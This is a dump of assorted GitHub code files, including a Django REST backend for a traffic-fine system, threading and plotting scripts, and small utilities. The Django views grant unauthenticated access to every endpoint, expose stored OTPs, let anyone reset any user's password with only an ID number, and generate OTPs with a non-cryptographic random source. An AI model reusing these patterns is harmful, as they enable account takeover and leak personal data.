linked-list-cycle-ii/linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74346809334","text":"from setuptools import setup, Extension\n\ndebug = False\n\nsources = {\n \"system\": \"ssystem simoptions energyoptions statespace utility sequtil simtimer\",\n \"state\": \"scomplex scomplexlist strandordering\",\n \"loop\": \"move moveutil loop\",\n \"energymodel\": \"nupackenergymodel energymodel\",\n \"interface\": \"multistrand_module options optionlists\"\n}\n\nsetup(ext_modules=[Extension(\n name=\"multistrand.system\",\n include_dirs=[\"./src/include\"],\n language=\"c++\",\n define_macros=[(\"DEBUG_MACROS\", None)] if debug else [(\"NDEBUG\", None)],\n undef_macros=[\"NDEBUG\"] if debug else [],\n extra_compile_args=[\"-std=c++11\", \"-w\", \"-Wall\"] + (\n [\"-g\", \"-O0\", \"-fno-inline\"] if debug else [\"-O3\"]),\n sources=[f\"src/{d}/{f}.cc\" for d, fs in sources.items()\n for f in fs.split(\" \")])])\n","repo_name":"DNA-and-Natural-Algorithms-Group/multistrand","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"15603041517","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, permissions\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom api.models import (\n Admin,\n Person,\n Driver,\n VehicleOwner,\n Vehicle,\n Fine,\n ViolationType,\n Accident,\n Message,\n PoliceOfficer,\n Violation,\n Suggestion,\n Schedule,\n VehicleAccident,\n OTPVerification,\n CameraLocation,\n OfficerLocation\n)\nfrom api.serializers import (\n ViolationTypeSerializer,\n UserSerializer,\n AdminSerializer,\n PersonSerializer,\n DriverSerializer,\n VehicleOwnerSerializer,\n VehicleSerializer,\n FineSerializer,\n AccidentSerializer,\n MessageSerializer,\n PoliceOfficerSerializer,\n ViolationSerializer,\n FineWithViolationAmountSerializer,\n SuggestionSerializer,\n ScheduleSerializer,\n scheduledOfficersSerializer,\n DriverDetailsSerializer,\n OfficerDetailsSerializer,\n FineDetailsSerializer,\n AccidentDetailsSerializer,\n VehicleAccidentSerializer,\n OTPVerificationSerializer,\n RecentAccidentsSerializer,\n OfficerLocationSerializer,\n CameraLocationSerializer,\n PoliceStationLocationsSerializer,\n FineIdSerializer,\n VehicleDetailsSerializer,\n MyTokenObtainPairSerializer\n)\n\nfrom rest_framework import generics\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.db.models import Count\nfrom django.core.mail import send_mail\nfrom pyotp import TOTP\nimport random\nimport string\nfrom django.http import JsonResponse\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom django.db.models.functions import ExtractMonth, ExtractDay\nfrom datetime import date, timedelta\n\n\n# jwt token view\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n\n queryset = User.objects.all().order_by(\"-date_joined\")\n serializer_class = UserSerializer\n permission_classes = [permissions.AllowAny]\n\n # driver mobile driver signup\n @action(detail=False, methods=[\"post\"])\n def driver_signup(self, request):\n \"\"\"Register a new user.\n api [POST] /api/users/driver_signup/]\n required ['password', 'email', 'first_name', 'last_name', 'nic', 'license_id']]\"\"\"\n\n user = User.objects.create_user(\n username=request.data[\"nic\"],\n password=request.data[\"password\"],\n email=request.data[\"email\"],\n )\n group = Group.objects.get(name=\"driver\")\n user.groups.add(group)\n user.save()\n p, is_created = Person.objects.get_or_create(\n first_name=request.data[\"first_name\"],\n last_name=request.data[\"last_name\"],\n defaults={\"nic\": request.data[\"nic\"]},\n )\n driver = Driver.objects.create(\n nic=p,\n license_id=request.data[\"license_id\"],\n user=user,\n )\n driver.save()\n return Response({\"status\": \"driver created\"}, status=status.HTTP_201_CREATED)\n\n # driver/officer mobile change password\n @action(detail=False, methods=[\"put\"])\n def change_password(self, request):\n \"\"\"\n Change a user's password.\n api [POST] /api/users/change_password/\n required: ['nic', 'old_password', 'new_password']\n \"\"\"\n nic = request.data.get(\"nic\")\n old_password = request.data.get(\"old_password\")\n new_password = request.data.get(\"new_password\")\n\n if not nic or not old_password or not new_password:\n return Response(\n {\"error\": \"NIC, old password, and new password are required.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response(\n {\"error\": \"User not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if user.check_password(old_password):\n user.set_password(new_password)\n user.save()\n # Update the session to avoid having to re-login\n\n return Response({\"status\": \"password changed\"}, status=status.HTTP_200_OK)\n else:\n return Response(\n {\"error\": \"Old password is incorrect.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n # admin web officer signup\n @action(detail=False, methods=[\"post\"])\n def officer_signup(self, request):\n \"\"\"Register a new user.\n api [POST] /api/users/officer_signup/]\n required ['password', 'first_name', 'last_name', 'telephone','nic', 'police_station']]\"\"\"\n print(\"officer signup\")\n print(request.data)\n user = User.objects.create_user(\n username=request.data[\"officer_id\"],\n password=request.data[\"password\"],\n )\n group = Group.objects.get(name=\"officer\")\n user.groups.add(group)\n user.save()\n p, is_created = Person.objects.get_or_create(\n first_name=request.data[\"first_name\"],\n last_name=request.data[\"last_name\"],\n telephone=request.data[\"telephone\"],\n address=\"\",\n defaults={\"nic\": request.data[\"nic\"]},\n )\n officer = PoliceOfficer.objects.create(\n nic=p,\n police_station=request.data[\"police_station\"],\n officer_id=request.data[\"officer_id\"],\n user=user,\n )\n officer.save()\n return Response({\"status\": \"officer created\"}, status=status.HTTP_201_CREATED)\n\n # driver/officer mobile send otp\n @action(detail=False, methods=[\"post\"])\n def send_otp(self, request):\n \"\"\"\n Generate and send an OTP to the user's email.\n api [POST] /api/users/send_otp/\n required: ['nic']\n \"\"\"\n nic = request.data.get(\"nic\")\n\n try:\n user = User.objects.get(username=nic)\n\n except User.DoesNotExist:\n return Response({\"error\": \"User not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Check if an OTPVerification entry with the same `nic` already exists\n otp_verification, created = OTPVerification.objects.get_or_create(\n nic=nic)\n otp = ''.join(random.choices(string.digits, k=6))\n\n otp_verification.otp = otp\n otp_verification.save()\n\n totp = TOTP(otp)\n otp_url = totp.provisioning_uri(user.email, issuer_name=\"YourApp\")\n\n subject = \"OTP Verification\"\n message = f\"Your OTP for verification is: {otp}\"\n from_email = \"trafficticketse18@gmail.com\" # Update with your email\n recipient_list = [user.email]\n\n send_mail(subject, message, from_email,\n recipient_list, fail_silently=False)\n\n return Response({\"status\": \"OTP sent successfully.\"}, status=status.HTTP_200_OK)\n\n # driver/officer mobile verify otp\n @action(detail=False, methods=[\"post\"])\n def verify_otp(self, request):\n \"\"\"\n Verify the entered OTP.\n api [POST] /api/users/verify_otp/\n required: ['nic', 'entered_otp']\n \"\"\"\n nic = request.data.get(\"nic\")\n entered_otp = request.data.get(\"entered_otp\")\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response({\"error\": \"User not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n try:\n otp_verification = OTPVerification.objects.get(nic=nic)\n except OTPVerification.DoesNotExist:\n return Response({\"error\": \"OTP not found for the user.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n stored_otp = otp_verification.otp\n\n if (stored_otp == entered_otp):\n return Response({\"status\": \"OTP is valid.\"}, status=status.HTTP_200_OK)\n else:\n return Response({\"error\": \"Invalid OTP.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=[\"put\"])\n def update_password(self, request):\n \"\"\"\n Change a user's password.\n api [POST] /api/users/update_password/\n required: ['nic','new_password']\n \"\"\"\n nic = request.data.get(\"nic\")\n new_password = request.data.get(\"new_password\")\n\n if not nic or not new_password:\n return Response(\n {\"error\": \"NIC and new password are required.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response(\n {\"error\": \"User not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n user.set_password(new_password)\n user.save()\n # Update the session to avoid having to re-login\n\n return Response({\"status\": \"password changed\"}, status=status.HTTP_200_OK)\n\n\nclass ViolationTypeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows violation types to be viewed or edited.\n \"\"\"\n\n queryset = ViolationType.objects.all()\n serializer_class = ViolationTypeSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass AdminViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows admins to be viewed or edited.\n \"\"\"\n\n queryset = Admin.objects.all()\n serializer_class = AdminSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass PersonViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows persons to be viewed or edited.\n \"\"\"\n\n queryset = Person.objects.all()\n serializer_class = PersonSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass DriverViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows drivers to be viewed or edited.\n \"\"\"\n\n queryset = Driver.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return DriverDetailsSerializer\n return DriverSerializer\n\n\nclass VehicleOwnerViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicle owners to be viewed or edited.\n \"\"\"\n\n queryset = VehicleOwner.objects.all()\n serializer_class = VehicleOwnerSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass VehicleViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicles to be viewed or edited.\n \"\"\"\n\n queryset = Vehicle.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"retrieve\":\n return VehicleDetailsSerializer\n return VehicleSerializer\n\n\nclass FineViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows fines to be viewed or edited.\n \"\"\"\n\n queryset = Fine.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return FineDetailsSerializer\n return FineSerializer\n\n\nclass FineByIdViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows a fine to be viewed or edited.\n \"\"\"\n\n serializer_class = FineIdSerializer\n permission_classes = [permissions.AllowAny]\n\n def get_queryset(self):\n driver_id = self.kwargs['driver_id']\n driver = Driver.objects.get(nic=driver_id)\n queryset = Fine.objects.filter(driver=driver)\n return queryset\n\n\nclass AccidentViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows accidents to be viewed or edited.\n \"\"\"\n\n queryset = Accident.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return AccidentDetailsSerializer\n return AccidentSerializer\n\n # admin web recent accidents\n @action(detail=False, methods=[\"GET\"])\n def get_recent_accidents(self, request, *args, **kwargs):\n queryset = Accident.objects.all().order_by('-index')[:6]\n serializer = RecentAccidentsSerializer(queryset, many=True)\n return Response(serializer.data)\n\n # admin web monthly accident count\n @action(detail=False, methods=[\"GET\"])\n def get_monthly_count(self, request, *args, **kwargs):\n current_year = date.today().year\n queryset = Accident.objects.filter(date__year=current_year).annotate(month=ExtractMonth(\n 'date')).values('month').annotate(count=Count('index')).values('month', 'count')\n monthly_count = [0]*12\n for data in queryset:\n monthly_count[data['month']-1] = data['count']\n print(queryset)\n return Response(monthly_count)\n\n # admin web weekly accident count\n @action(detail=False, methods=[\"GET\"])\n def get_weekly_count(self, request, *args, **kwargs):\n today = date.today()\n weekday = today.weekday()\n start_of_week = today - timedelta(days=weekday)\n end_of_week = start_of_week + timedelta(days=6)\n queryset = Accident.objects.filter(date__range=[start_of_week, end_of_week]).annotate(\n day=ExtractDay('date')).values('day').annotate(count=Count('index')).values('day', 'count')\n weekly_count = [0]*7\n for data in queryset:\n weekly_count[data['day']-start_of_week.day] = data['count']\n return Response(weekly_count)\n\n # admin web reported accident count\n @action(detail=False, methods=[\"GET\"])\n def get_reported_accident_count(self, request, *args, **kwargs):\n today = date.today()\n queryset = Accident.objects.filter(date=today)\n return Response(queryset.count())\n\n\nclass MessageViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows messages to be viewed or edited.\n \"\"\"\n\n queryset = Message.objects.all()\n serializer_class = MessageSerializer\n permission_classes = [permissions.AllowAny]\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n # Create a list to hold the serialized data for each message\n data = []\n\n for message in queryset:\n # Get the sender's police officer information based on sender_nic\n try:\n sender_id = message.sender_nic\n police_officer = PoliceOfficer.objects.get(\n officer_id=sender_id)\n\n police_station = police_officer.police_station\n except PoliceOfficer.DoesNotExist:\n sender_id = None\n police_station = None\n\n # Create a dictionary for the current message\n message_data = {\n 'message_body': message.body,\n 'sender_id': sender_id,\n 'police_station': police_station,\n }\n\n data.append(message_data)\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass PoliceOfficerViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows officers to be viewed or edited.\n \"\"\"\n\n queryset = PoliceOfficer.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return OfficerDetailsSerializer\n return PoliceOfficerSerializer\n\n\nclass ViolationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows violations to be viewed or edited.\n \"\"\"\n\n queryset = Violation.objects.all()\n serializer_class = ViolationSerializer\n permission_classes = [permissions.AllowAny]\n\n# new\n\n\nclass SuggestionViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows suggestions to be viewed or edited.\n \"\"\"\n\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass ScheduleViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows schedules to be viewed or edited.\n \"\"\"\n\n queryset = Schedule.objects.all()\n serializer_class = ScheduleSerializer\n permission_classes = [permissions.AllowAny]\n\n # admin web create schedule\n @action(detail=False, methods=[\"post\"])\n def create_schedule(self, request):\n \"\"\"Create a new schedule.\n api [POST] /api/schedules/create_schedule/]\n required ['officer_id', 'location', 'shift', 'date']]\"\"\"\n print(\"create schedule\")\n print(request.data[\"date\"])\n\n try:\n officer = PoliceOfficer.objects.get(\n officer_id=request.data[\"officer_id\"])\n except:\n return Response(\n {\"error\": \"Officer not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n schedule = Schedule.objects.create(\n officer=officer,\n location=request.data[\"location\"],\n shift=request.data[\"shift\"],\n date=request.data[\"date\"],\n police_station=request.data[\"police_station\"],\n )\n schedule.save()\n return Response({\"status\": \"schedule created\"}, status=status.HTTP_201_CREATED)\n\n # admin web get scheduled officers\n @action(detail=False, methods=[\"GET\"])\n def get_scheduled_officers(self, request, *args, **kwargs):\n date = request.GET.get('date')\n policeStation = request.GET.get('police_station')\n queryset = Schedule.objects.filter(\n date=date, police_station=policeStation)\n serializer = scheduledOfficersSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass VehicleAccidentViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicle accidents to be viewed or edited.\n \"\"\"\n\n queryset = VehicleAccident.objects.all()\n serializer_class = VehicleAccidentSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass OfficerLocationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows officer locations to be viewed or edited.\n \"\"\"\n\n queryset = OfficerLocation.objects.all()\n serializer_class = OfficerLocationSerializer\n permission_classes = [permissions.AllowAny]\n\n # admin web get locations related to police station\n @action(detail=False, methods=[\"GET\"])\n def get_police_station_locations(self, request, *args, **kwargs):\n police_station = request.GET.get('police_station')\n queryset = OfficerLocation.objects.filter(\n police_station=police_station)\n serializer = PoliceStationLocationsSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass CameraLocationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows camera locations to be viewed or edited.\n \"\"\"\n\n queryset = CameraLocation.objects.all()\n serializer_class = CameraLocationSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass OTPVerificationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n queryset = OTPVerification.objects.all()\n serializer_class = OTPVerificationSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass FineList(generics.ListAPIView):\n queryset = Fine.objects.all()\n serializer_class = FineWithViolationAmountSerializer\n\n def get_queryset(self):\n # Get the driver_id from the request query parameters\n driver_id = self.request.query_params.get('driver_id')\n\n # Check if driver_id is provided in the request\n if driver_id:\n # Filter the fines based on the provided driver_id\n queryset = Fine.objects.filter(driver__nic__nic=driver_id)\n else:\n # If driver_id is not provided, return an empty queryset\n queryset = Fine.objects.none()\n\n return queryset","repo_name":"NimeshRancha/TrafficTicketBackend-main","sub_path":"TrafficTicket/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23519808268","text":"import threading\nimport time\nclass shop:\n def __init__(self,name):\n self.__name=name\nclass user:\n def __init__(self,name):\n self.__name = name\nclass 秒杀(threading.Thread):\n count =20\n def __init__(self,user):\n super().__init__()\n\n def run(self):\n while 秒杀.count>0:\n mutex.acquire() #加锁\n if 秒杀.count>0:\n print('{}抢到了{}号商品'.format(self.name,秒杀.count))\n 秒杀.count-=1\n time.sleep(0.01)\n mutex.release() #解锁\n #else:\n #print('抢没了')\n \n\nif __name__=='__main__':\n count=20\n mutex =threading.Lock()\n for i in range(15):\n p=秒杀(i)\n p.start()\n\n \n","repo_name":"zhaoshuo1988/learngit","sub_path":"多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11095015772","text":"from ts_limit.grid import Grid\nimport numpy as np\nimport sys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom math import floor\nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\nfrom os import listdir\nfrom os.path import isfile\nfrom matplotlib import rc\nimport sys\nimport re\n\n\ntry:\n which_roi = int(sys.argv[1])\nexcept IndexError:\n print('you should provide an argument')\n sys.exit()\ntry:\n H0 = np.loadtxt(f'../../roi_simulation/roi_files/roi_{which_roi}/loglike_H0.dat')\nexcept IOError:\n pass\n\ndirectory = f'roi_{which_roi}'\n\n\ndef check_files(directory, which_roi, prefix='out_', postfix='.dat'):\n '''Checks files in directory for completeness, i.e. if all data lines are present.\n TODO: Include check if all 900 files are present.\n Returns:\n data_set, dictionary with likes, missing lines and missing gm.\n '''\n file_list = listdir(directory)\n data_list = []\n for c, v in enumerate(file_list):\n if prefix in v and postfix in v and not 'copy' in v:\n data_list.append(f'{directory}/{v}')\n \n try:\n loglike_H0 = np.loadtxt(f'/nfs/astrop/n1/kuhlmann/NGC_1275/ts_limit/roi_simulation/roi_files/roi_{which_roi}/loglike_H0.dat')\n except IOError:\n pass\n numbers = np.zeros((900, 2), dtype=int)\n numbers[:, 0] = np.arange(0, 900, dtype=int)\n missing_lines = []\n likes = np.zeros((900)) # indices: files, simulation, value\n for n in numbers:\n # print(n)\n try:\n temp = np.loadtxt(f'{directory}/{prefix}{n[0]:03}{postfix}')\n if np.any(np.isclose(temp, np.zeros(temp.shape))):\n print(f\"{n[0]} has zeros!\")\n counter = 0\n for c, line in enumerate(temp):\n if np.any(np.isclose(line, np.zeros(line.shape))):\n missing_lines.append([n[0], c])\n counter += 1\n else:\n pass\n numbers[n[0], 1] = counter\n elif temp.shape[0] != 100 or temp.shape[1] != 3:\n raise IOError\n else:\n try:\n ts_fit = np.sort(2 * (temp[:, -1] - loglike_H0))\n except NameError:\n ts_fit = np.sort(2 * (temp[:, -1] - temp[:, 0]))\n likes[n[0]] = ts_fit[94]\n except IOError:\n print(f'file {n} is missing')\n missing_lines.append([n[0], 0])\n # missing_lines.append([n[0], 25])\n # missing_lines.append([n[0], 50])\n # missing_lines.append([n[0], 75]) \n missing_gm = []\n for line in missing_lines:\n arg = [line[0], which_roi, 0]\n if arg not in missing_gm:\n missing_gm.append(arg)\n np.savetxt(f'{directory}/missing_args.txt', np.array(missing_gm), fmt=\"%1.1i\")\n data_set = {'likes': likes, 'missing_lines': missing_lines, 'missing_gm': missing_gm}\n return data_set\n\n\ndef write_ts(likes, which_roi):\n try:\n ts = np.loadtxt('ts/ts.dat')\n ts = ts.reshape((int(ts.flatten().shape[0] / 2), 2))\n for line in ts:\n if which_roi == line[0]:\n break\n else:\n ts = np.append(ts, np.array([[which_roi, np.max(likes)]]), axis=0)\n \n except IOError:\n ts = np.array([[which_roi, np.max(likes)]])\n ts = ts.reshape(1, 2)\n np.savetxt('ts/ts.dat', ts, fmt=\"%1.1i %1.3f\")\n\n\ndef plot_data(likes, which_roi, local_save_dir, afs_save_dir):\n likes = likes.reshape(30, 30)\n fig = plt.figure(1, dpi=150)\n cmap = plt.get_cmap('seismic')\n levels = MaxNLocator(nbins=cmap.N).tick_values(-40, 40)\n ax = fig.add_subplot(111)\n norm = BoundaryNorm(levels, cmap.N)\n x_helper = np.linspace(-1, 2, num=30, endpoint=True)\n dx_2 = (x_helper[1] - x_helper[0]) / 2\n x = np.logspace(-1 - dx_2, 2 + dx_2, num=31, endpoint=True, base=10.0)\n y = np.logspace(-1 - dx_2, 2 + dx_2, num=31, endpoint=True, base=10.0)\n g_space = np.logspace(-1. - dx_2, 2. - dx_2, num=30, base=10.0, endpoint=True) # in 1e-11 1/GeV\n m_space = np.logspace(-1. - dx_2, 2. - dx_2, num=30, base=10.0, endpoint=True) # in neV\n grid = np.zeros((g_space.shape[0], m_space.shape[0], 2))\n for i in range(g_space.shape[0]):\n for j in range(m_space.shape[0]):\n grid[i, j, :] = g_space[i], m_space[j]\n grid = grid.reshape((m_space.shape[0] * g_space.shape[0], 2))\n xmin, xmax, ymin, ymax = 0.3, 30.0, 0.3, 7.0\n pcol = ax.pcolor(x, y, likes, cmap=cmap, norm=norm, alpha=1)\n cb = fig.colorbar(pcol, ax=ax, extend='neither', ticks=(-40, -20, -10, -5, 0, 5, 10, 20, 40), \\\n label='TS')\n ticklabels = cb.ax.get_yticklabels()\n cb.ax.set_yticklabels(ticklabels, ha='right')\n cb.ax.yaxis.set_tick_params(pad=20)\n ax.set_xlim((np.power(10, -1 - dx_2), np.power(10, 2+dx_2)))\n ax.set_ylim((np.power(10, -1 - dx_2), np.power(10, 2+dx_2)))\n ax.set_xlabel('$m_{a}$ [neV]')\n ax.set_ylabel('$g_{a\\gamma\\gamma}$ [$10^{-11}$ GeV$^{-1}$]')\n ax.set_xticks([1e-1, 1e0, 1e1, 1e2])\n ax.set_xticklabels([r'$10^{-1}$', r'$10^{0}$', r'$10^{1}$', r'$10^{2}$'], ha='left')\n\n ax.set_yticks([1e-1, 1e0, 1e1, 1e2])\n ax.set_yticklabels([r'$10^{-1}$', r'$10^{0}$', r'$10^{1}$', r'$10^{2}$'], ha='left')\n ax.yaxis.set_tick_params(pad=20)\n ax.set_xscale('log')\n ax.set_yscale('log')\n fig.subplots_adjust(hspace=0)\n fig.patch.set_facecolor('white')\n fig.tight_layout(pad=2, h_pad=1.5, w_pad=2)\n fig.savefig(f'/afs/desy.de/user/k/kuhlmjul/NGC_1275/maps/ts_fixed_{which_roi}.png', dpi=150, bbox_inches='tight')\n fig.savefig(f'colormaps/ts_fixed_{which_roi}.png', dpi=150, bbox_inches='tight')\n# fig.savefig('test_fig.png')\n\n\ndata = check_files(f'roi_{which_roi}', which_roi)\nif data['missing_lines'] == []:\n plot_data(data['likes'], which_roi, f'colormaps/ts_fixed_{which_roi}.png', f'/afs/desy.de/user/k/kuhlmjul/NGC_1275/maps/ts_fixed_{which_roi}.png')\n write_ts(data['likes'], which_roi)\nelse:\n pass\n","repo_name":"specktakel/ts_limit","sub_path":"grid_ts/outdata/loglike.py","file_name":"loglike.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18039309782","text":"import argparse\nimport pathlib\nfrom . import rspec_compile_sources\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', nargs='+')\n parser.add_argument('--destination')\n args = parser.parse_args(args)\n return args, parser\n\n\ndef open_dir(source):\n path = pathlib.Path(source)\n if not path.exists():\n raise ValueError('dir does not exists')\n if not path.is_dir():\n raise ValueError('dir is not a dir')\n return path\n\n\nif __name__ == '__main__':\n args, parser = parse_args()\n sources = [open_dir(source) for source in args.dir]\n destination = open_dir(args.destination)\n rspec_compile_sources(sources, destination)\n","repo_name":"ClassHeroes/specs-compiler","sub_path":"swag/rspec/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19482008065","text":"def print_hi(name):\n print(f'Hi, {name}')\n# система уравнений\n\ndef modify_list(l):\n le = len(l) - 1\n i = le\n while i != -1:\n if l[i] % 2:\n del l[i]\n else:\n l[i] = l[i] // 2\n i -= 1\n return\n\nif __name__ == '__main__':\n print_hi('PyCharm')","repo_name":"komyelizqa/education-proj","sub_path":"function_list.py","file_name":"function_list.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28023621550","text":"'''\n\tTest Playlist Generator v1.02\n\t\n\tDescription: Used to create a test playlist file for VS\n\tAuthor: Jordan Munch O'Hare\n\tDate: 25-07-2019\n\t\n\tOptional Arguments:\n\t\t1: Filename to read\n\t\t2: Location to save file\n'''\n\nimport time\nimport sys\nfrom pathlib import Path\n\nnameOfFileToParse = \"\"\nlocationToSaveFile = \"\"\nargs = sys.argv[1:]\n#print(args)\n\ndef Argument1FileName():\n\tglobal nameOfFileToParse\n\tnameOfFileToParse = args[0]\n\tif nameOfFileToParse.find('.') == -1:\n\t\tprint('Filename error, did you forget the filetype \".txt\"?')\n\t\texit()\n\n\nif len(args) == 0:\n\tnameOfFileToParse = \"tests.txt\"\nelif len(args) == 1:\n\tArgument1FileName()\nelif len(args) == 2:\n\tArgument1FileName()\n\tlocationToSaveFile = args[1]\nelse:\n\tprint(\"Too many arguments\")\n\texit()\n\n\noutFileName = nameOfFileToParse[:nameOfFileToParse.index('.')] + '-' + time.strftime(\"%Y-%m-%d\") + '.playlist'\ninputFileName = nameOfFileToParse\ntestCount = 0\n\n# Check for input file\nif(not Path(inputFileName).is_file()):\n\tprint(\"No input file found. Please create '\" + inputFileName + \"' with your desired tests on each line.\")\n\texit()\n\n# Open files, creating the output file if it does not exist\nfileIn = open(inputFileName)\nfileOut = open(locationToSaveFile + outFileName, 'w+')\n\n##################\n\nfileOut.write('\\n')\n\nfor line in fileIn:\n\tif line.strip():\n\t\t#print(line.rstrip())\t\n\t\tfileOut.write('\\t\\n')\n\t\ttestCount += 1\n\nfileOut.write('')\n\nfileIn.close()\nfileOut.close()\n\nprint('Generated ' + locationToSaveFile + outFileName + ' with ' + str(testCount) + ' tests')","repo_name":"ohare93/Python-Mini-Projects","sub_path":"TestPlaylistGenerator/TestPlaylistGenerator.py","file_name":"TestPlaylistGenerator.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26574230631","text":"from contextlib import suppress\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch, sentinel\n\nfrom evenless_api import dependencies\nfrom evenless_api.settings import Settings\n\n\n@patch(\n \"evenless_api.dependencies.Settings\", side_effect=[sentinel.first, sentinel.second]\n)\ndef test_get_settings_cached(_) -> None:\n # given\n dependencies.get_settings.cache_clear()\n\n # when\n dependencies.get_settings()\n settings = dependencies.get_settings()\n\n # then\n assert settings is sentinel.first\n\n\n@patch(\"notmuch.Database\")\ndef test_get_db(mock_db) -> None:\n # given\n path = \"db/path\"\n settings = Settings(notmuch_db_path=path)\n\n # when\n gen = dependencies.get_db(settings=settings)\n next(gen)\n with suppress(StopIteration):\n next(gen)\n\n # then\n mock_db.assert_called_once_with(path)\n mock_db.return_value.__enter__.assert_called_once()\n mock_db.return_value.__exit__.assert_called_once()\n\n\n@patch(\"evenless_api.dependencies.message_from_file\")\ndef test_get_message_body(mock) -> None:\n # given\n inner = dependencies.get_message_body()\n mock_path = MagicMock(spec=Path)\n body = \"This is an email body.\"\n mock.return_value.get_body.return_value.get_payload.return_value = body\n\n # when\n result = inner(mock_path)\n\n # then\n mock_path.open.assert_called_once()\n assert result == body\n","repo_name":"phha/evenless_api","sub_path":"tests/unit_tests/test_dependencies.py","file_name":"test_dependencies.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7704840965","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\n\n\nclass SensorData(models.Model):\n\tSOIL_MOISTURE = (\n\t\t('wet','Wet'),\n\t\t('dry', 'Dry'),\n\t)\n\t\n\ttemperature = models.DecimalField(blank=False, null=False, max_digits = 7, 